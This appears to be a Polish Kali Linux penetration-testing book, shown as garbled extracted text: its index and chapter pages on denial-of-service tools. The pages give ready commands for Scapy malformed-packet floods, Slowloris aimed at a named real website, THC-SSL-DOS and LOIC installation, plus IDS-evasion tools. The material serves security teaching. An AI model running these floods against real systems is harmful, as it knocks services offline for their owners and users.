szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
